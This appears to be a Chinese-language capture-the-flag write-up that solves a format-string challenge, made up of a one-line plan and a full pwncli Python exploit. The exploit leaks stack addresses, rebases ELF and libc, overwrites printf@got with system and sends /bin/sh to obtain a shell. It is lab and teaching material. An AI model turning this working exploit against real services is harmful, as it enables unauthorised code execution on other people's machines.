解题思路
简单的 printf 漏洞：修改 printf@got 为 system，然后再输入 /bin/sh 获取 shell。
exp
from pwncli import *
cli_script()
# I/O channel, target ELF and libc are handed over by pwncli's `gift` dict.
p = gift['io']
e = gift['elf']
libc = gift['libc']
# Leak two stack slots through the user-controlled format string. The reply
# is expected to be "<ptr>,<ptr>\n"; positional indices 41 and 43 are
# presumably tied to this binary's stack layout — confirm if it changes.
p.sendline("%41$p,%43$p")
msg = p.recvline()
code_addr, libc_addr = msg.split(b",")
# Rebase the ELF and libc from the leaks. 74 and 240 are hard-coded
# distances from the leaked values to `main` / `__libc_start_main`;
# presumably specific to this build and the supplied libc — TODO confirm
# if either differs.
code_base_addr = int16(code_addr.decode()) - e.sym['main'] - 74
libc_base_addr = int16(libc_addr.decode()) - libc.sym['__libc_start_main'] - 240
e.address = code_base_addr
libc.address = libc_base_addr
log_address("code_base_addr", code_base_addr)
# Second use of the same format-string bug: write libc's `system` over
# printf@got in short-sized chunks (offset=6 is the argument index at which
# the format string itself sits). NOTE(review): this write is only possible
# because the GOT is writable here and the format string is user-controlled;
# Full RELRO (read-only GOT) or a fixed format string removes this step.
payload = fmtstr_payload(offset=6, writes={e.got['printf']:libc.sym['system']}, write_size="short", write_size_max="short")
p.sendline(payload)
# Crude pacing so the target has consumed the write before the next line;
# a recv on the target's reply would be a deterministic alternative.
sleep(1)
# Per the writeup, the next printf(input) call now resolves to system("/bin/sh").
p.sendline("/bin/sh")
p.interactive()
引用与参考
1、My Blog
2、CTF Wiki
3、pwncli